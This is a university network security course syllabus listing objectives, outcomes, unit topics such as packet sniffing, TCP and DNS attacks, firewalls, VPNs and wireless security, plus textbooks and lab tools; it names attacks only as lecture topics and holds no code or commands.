About the Course:
Give an overview and conceptual understanding of network related security aspects. Students will have opportunities to dwell well into technical “how to” with hands-on sessions and with case studies.
To provide an overall view of Network Security and introduce the concept of packet analysis.
To understand the security problems in the design and implementation of the TCP, IP/ICMP, ARP protocols.
To learn the vulnerabilities in DNS protocol and to implement and experiment with Firewall rules.
To provide an overview of network management techniques and implementation of VPN.
To have a deep understanding of security aspects of wireless networks, bluetooth and cloud computing.
At the end of this course, the students will be able to:
Sniff packets from clients and analyse them to extract important info such as headers, passwords etc.
Launch DoS and MITM attacks using various protocols and mitigate them.
Configure firewalls on Linux machines and perform network monitoring using IDS/IPS.
Design and implement VPN for a secure connection over internet.
Master in wireless network security systems in depth, and enhance the skills of enabling and configuring a wireless network system.
Introduction and Packet Analysis - 10 Hours
CIA principles, Attack surface and types, Assets, Vulnerabilities and Threats, Countermeasures, Privacy, General Data Protection Regulation, Security vs Privacy, Data Breaches. Real Life Examples of Cyber Crime, Security framework, Job outlook. Packet Sniffing and Spoofing: Introduction, Sending packets: Network Interface Card (NIC), BSD packet filter (BPF). Packet sniffing: Receiving packets using sockets, Packet sniffing using Raw sockets, Packet sniffing using PCAP API, Processing captured packets. Packet spoofing: Sending normal packets using sockets, Constructing spoofed raw ICMP packets and UDP packets. Sniffing and then spoofing, Python vs Scapy, Hybrid approach, Endianness.
OSI Protocol Attacks - 12 Hours
Attacks on the TCP protocols: Introduction, TCP overview, Send and receive buffers, SYN flood attack: TCP 3-way handshake, the SYN flooding attack, Launching the attack using Netwox and C, Countermeasure. TCP reset attack: TCP reset attack on Telnet, SSH and video streaming connections. TCP session hijacking attack: TCP session and session hijacking, Launching the attack, Hijacked TCP connection. Reverse shell: working, redirecting IO to TCP connection, Creating reverse shell. Countermeasure. Case Study 1.
DNS & Network Security - 12 Hours
DNS Attacks: Introduction, DNS hierarchy, zones and servers, DNS query process, Experiment Setup, Constructing DNS request and response using Scapy, DNS attacks: Overview, Local DNS cache poisoning attack, Remote DNS cache poisoning attack (Kaminsky attack), Reply forgery attacks from malicious DNS servers, DNS rebinding attack, Countermeasure against DNS spoofing attacks, DoS attacks on DNS servers. Firewall: Introduction, Requirements of a firewall, Firewall characteristics and Access policy, Types of firewall, NG firewall, Shortcomings, Firewall location and configuration: DMZ networks, Firewall topologies. Introduction, Build a simple firewall, Netfilter, iptables firewall in Linux, Stateful firewall and connection tracking, Application/Proxy firewall and Web proxy, Evading firewalls Intrusion Detection and Prevention: Intruders, Intrusion detection, Analysis approaches, Host-based intrusion detection, Network- based intrusion detection, Distributed or hybrid intrusion detection, Honeypots, Example system: Snort, Intrusion prevention system.
Network Management and VPN - 12 Hours
Network Management: IT security management overview and Risk assessment, IT security controls, Plans, and procedures, Physical and infrastructure security, Human Resources security, Security auditing. Virtual Private Network: Introduction, Why VPN, analogy and tunnelling. Overview of TLS/SSL VPN: Establishing a tunnel, Forwarding and releasing IP packets, TLS/SSL VPN details. Building, Setup and Testing VPN. Bypassing Firewall using VPN. The Heartbleed Bug and Attack: Introduction and the Heartbeat protocol, Launching the attack, Fixing the Heartbleed bug. Case Study 2.
Cloud and Wireless Security - 10 Hours
Cloud security: Service and deployment models, Layers, Security issues in Cloud computing. Bluetooth security: Bluetooth Protocol Stack, Multiple Security Modes. Wireless communications and 802.11 WLAN standards: Wireless Protected Access (WPA), IEEE 802.1x, 802.11i/ WPA2, Wireless Network Threats. ZigBee security and Wireless mesh network security.
1: “Computer & Internet Security: A Hands-on Approach”, Wenliang Du, 2nd Edition, 2019
1: “Computer Security: Principles and Practice”, William Stallings and Lawrie Brown, Pearson Education, 3rd Edition, 2010
Tools & Languages:
SEED Ubuntu VM, Wireshark, Snort, Netwox, Scapy
Desirable Knowledge : UE19CS253 – Computer Networks